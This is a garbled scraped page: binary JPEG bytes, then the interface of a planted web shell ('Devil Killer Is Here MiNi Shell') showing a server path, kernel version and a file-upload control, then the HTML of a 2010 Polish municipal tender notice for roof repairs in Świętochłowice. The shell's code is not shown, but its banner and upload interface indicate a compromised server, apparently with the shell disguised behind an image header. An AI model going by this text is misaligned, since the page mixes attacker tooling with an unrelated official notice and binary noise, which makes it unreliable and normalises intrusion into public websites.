JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100702/173997-N-2010.html

<p class="kh_header"><b>Świętochłowice: Remont dachów w n/w budynkach przy:
ul. Dworcowej 5a, ul. Pocztowej 1, ul. Bytomskiej 29, ul. Krasickiego 5-5a-5b,
ul. Chopina 39, ul. Matejki 5-7, ul. Strzelców Bytomskich 1, ul. Strzelców Bytomskich 3, ul. Strzelców Bytomskich 7, ul. Barlickiego 43 (lok. użytk.), ul. Świerczyny 9,
ul. Świerczyny 11, ul. Bocznej 8-8a-8b, ul. Chorzowskiej 99, ul. Wallisa 10, ul. Św. Jana 2, ul. Św. Jana 1, ul. Wallisa 3, ul. Bytomskiej 69, ul. Imieli 2, ul. Łagiewnickiej 72,
ul. Polaka 4-6-8, ul. Katowickiej 29-29a, ul. Katowickiej 33-33a 
w Świętochłowicach.</b><br>
<b>Numer ogłoszenia: 173997 - 2010; data zamieszczenia: 02.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Tunelowa 2, 41-600 Świętochłowice, woj. śląskie, faks (032) 245 48 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> mzbm.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachów w n/w budynkach przy:
ul. Dworcowej 5a, ul. Pocztowej 1, ul. Bytomskiej 29, ul. Krasickiego 5-5a-5b,
ul. Chopina 39, ul. Matejki 5-7, ul. Strzelców Bytomskich 1, ul. Strzelców Bytomskich 3, ul. Strzelców Bytomskich 7, ul. Barlickiego 43 (lok. użytk.), ul. Świerczyny 9,
ul. Świerczyny 11, ul. Bocznej 8-8a-8b, ul. Chorzowskiej 99, ul. Wallisa 10, ul. Św. Jana 2, ul. Św. Jana 1, ul. Wallisa 3, ul. Bytomskiej 69, ul. Imieli 2, ul. Łagiewnickiej 72,
ul. Polaka 4-6-8, ul. Katowickiej 29-29a, ul. Katowickiej 33-33a 
w Świętochłowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane związane z remontem dachów budynków przy: ul. Dworcowej 5a, ul. Pocztowej 1, ul. Bytomskiej 29, ul. Krasickiego 5-5a-5b,
ul. Chopina 39, ul. Matejki 5-7, ul. Strzelców Bytomskich 1, ul. Strzelców Bytomskich 3, ul. Strzelców Bytomskich 7, ul. Barlickiego 43 (lok. użytk.), ul. Świerczyny 9, ul. Świerczyny 11, ul. Bocznej 8-8a-8b, ul. Chorzowskiej 99, ul. Wallisa 10, ul. Św. Jana 2, ul. Św. Jana 1, ul. Wallisa 3, ul. Bytomskiej 69, ul. Imieli 2, ul. Łagiewnickiej 72, ul. Polaka 4-6-8, ul. Katowickiej 29-29a, ul. Katowickiej 33-33a w Świętochłowicach.
2.	Zakres robót obejmuje między innymi wymianę pokrycia dachu krytego papą, wymianę pokrycia dachu krytego dachówką, wymianę deskowania, wzmocnienie krokwi, wymianę rynien i rur spustowych, przemurowanie kominów, wymianę obróbek blacharskich.
3.	Zamawiający dopuszcza możliwość zastosowania materiałów lub urządzeń równoważnych, tj. o parametrach technicznych i jakościowych nie gorszych niż określono w SIWZ - wyłącznie w odniesieniu do materiałów lub urządzeń, których pochodzenie zostało określone przez Zamawiającego przez wskazanie znaków towarowych, patentów lub pochodzenia. 
4.	Zamawiający w porozumieniu z użytkownikiem będzie podejmował decyzje, co do sposobu dysponowania materiałami pochodzącymi z rozbiórki.
5.	Na roboty będące przedmiotem zamówienia ustala się okres gwarancji jakości, który wynosi 60 miesięcy. Bieg gwarancji dla całego przedmiotu zamówienia rozpoczyna się w dniu następnym, licząc od daty odbioru końcowego robót.
6.	Przedmiot zamówienia opisany jest szczegółowo w przedmiarach robót załączonych do SIWZ jako Załącznik nr 8 oraz w specyfikacjach technicznych wykonania i odbioru robót budowlanych załączonych do SIWZ jako Załącznik nr 9.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się obowiązek wniesienia przez  wykonawcę wadium w wysokości:
w odniesieniu do Zadania 1:	5500 zł,	słownie:	pięć tysięcy pięćset zł 00/100
w odniesieniu do Zadania 2:	6500 zł,	słownie:	sześć tysięcy pięćset zł 00/100
w odniesieniu do Zadania 3:	3500 zł,	słownie:	trzy tysiące pięćset zł 00/100
w odniesieniu do Zadania 4:	500 zł,	słownie:	pięćset zł 00/100
w odniesieniu do Zadania 5:	4000 zł,	słownie:	cztery tysiące zł 00/100
w odniesieniu do Zadania 6:	11000 zł,	słownie:	jedenaście tysięcy zł 00/100
w odniesieniu do Zadania 7:	13000 zł,	słownie:	trzynaście tysięcy zł 00/100
w odniesieniu do Zadania 8:	9000 zł,	słownie:	dziewięć tysięcy sł 00/100
w odniesieniu do Zadania 9:	4000 zł,	słownie:	cztery tysiące zł 00/100
Jeżeli wykonawca składa ofertę na więcej niż jedno Zadanie - wnosi wadium odpowiednio w wysokości określonej dla tych Zadań. 
2.	Wadium wnosi się przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie
Opis sposobu dokonywania oceny spełniania tego warunku
1.	W odniesieniu do Zadania 1:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 25 000,00 zł brutto.
2.	W odniesieniu do Zadania 2:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 70 000,00 zł brutto.
3.	W odniesieniu do Zadania 3:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 40 000,00 zł brutto.
4.	W odniesieniu do Zadania 4:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 25 000,00 zł brutto.
5.	W odniesieniu do Zadania 5:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 40 000,00 zł brutto.
6.	W odniesieniu do Zadania 6:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego dachówką o wartości każdej z tych robót wynoszącej co najmniej 120 000,00 zł brutto.
7.	W odniesieniu do Zadania 7:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego dachówką o wartości każdej z tych robót wynoszącej co najmniej 120 000,00 zł brutto.
8.	W odniesieniu do Zadania 8:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego dachówką o wartości każdej z tych robót wynoszącej co najmniej 100 000,00 zł brutto.
9.	W odniesieniu do Zadania 9:
Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane obejmujące zakresem remont dachu krytego papą o wartości każdej z tych robót wynoszącej co najmniej 50 000,00 zł brutto.
Opis sposobu dokonywania oceny spełniania w/w warunków udziału w postępowaniu:
1. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą.
2. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie warunków udziału w postępowaniu,
3. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia
Opis sposobu dokonywania oceny spełniania tego warunku
W odniesieniu do Zadania 1, 2, 3, 4, 5, 6, 7, 8, 9: Wykonawca musi dysponować co najmniej:
  - kierownikiem budowy (co najmniej 1 osoba) posiadającym uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą z 7 lipca 1994 r. Prawo budowlane (t.j.: Dz. U. z 2006 r., nr 156, poz. 1118 z późn. zm.) uprawniające do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń, lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

Opis sposobu dokonywania oceny spełniania w/w warunków udziału w postępowaniu:
1. Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie dokumentów i oświadczeń złożonych przez wykonawcę wraz z ofertą.
2. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie warunków udziału w postępowaniu,
3. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa
Opis sposobu dokonywania oceny spełniania tego warunku
III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY
III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:
wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 
oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:
oświadczenie o braku podstaw do wykluczenia 
aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy.
wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANA UMOWY
Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: tak
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
1.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy tylko w odniesieniu do terminu wykonania w przypadku:
a) wystąpienia warunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót, lub
b) wystąpienia konieczności wykonania zamówienia dodatkowego do zamówienia podstawowego stanowiącego przedmiot umowy.
2.	Zmiany umowy mogą zostać dokonane pod warunkiem przedłożenia Zamawiającemu pisemnego uzasadnienia konieczności wprowadzenia zmian z przyczyn niezależnych od Wykonawcy oraz wyrażenia przez Zamawiającego zgody na tę zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZBM Świętochłowice, ul. Tunelowa 2, pokój nr 5 lub pocztą za zaliczeniem pocztowym,  po wcześniejszym złożeniu wniosku. Cena SIWZ 50 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2010 godzina 09:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Świętochłowicach przy ul. Tunelowej 2 - Kancelaria pokój nr 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 obejmuje wykonanie remontu dachów budynków mieszkalnych przy ul. Dworcowej 5a, ul. Pocztowej 1, ul. Bytomskiej 29,ul. Krasickiego 5-5a-5b. Zakres robót obejmuje m.in.: wymianę rynien i rur spustowych, wymianę deskowania, wymianę elementów konstrukcyjnych dachu, wzmocnienie krokwi, wymianę pokrycia dachu krytego papą, przemurowanie kominów. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 obejmuje wykonanie remontu dachów budynków mieszkalnych przy ul. Chopina 39, ul. Matejki 5-7. Zakres robót obejmuje m.in.: rozebranie gontów, pokrycie dachu papą oraz dachówką bitumiczną, osadzenie okien w połaci dachowej, naprawę obróbek blacharskich, wymianę rynien i rur spustowych, przemurowanie kominów. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 obejmuje wykonanie remontu dachów budynków mieszkalnych przy ul. Strzelców Bytomskich 1, ul. Strzelców Bytomskich 3, ul. Strzelców Bytomskich 7. Zakres robót obejmuje m.in.: wymianę pokrycia dachu krytego papą, wymianę deskowania, wzmocnienie krokwi, wymianę rynien i rur spustowych, przemurowanie kominów, wymianę obróbek blacharskich. Przedmiot zamówienia został szczegółowo opisany w przedmiarze robót (załącznik nr 8 do SIWZ) oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.00-6.</p></li>
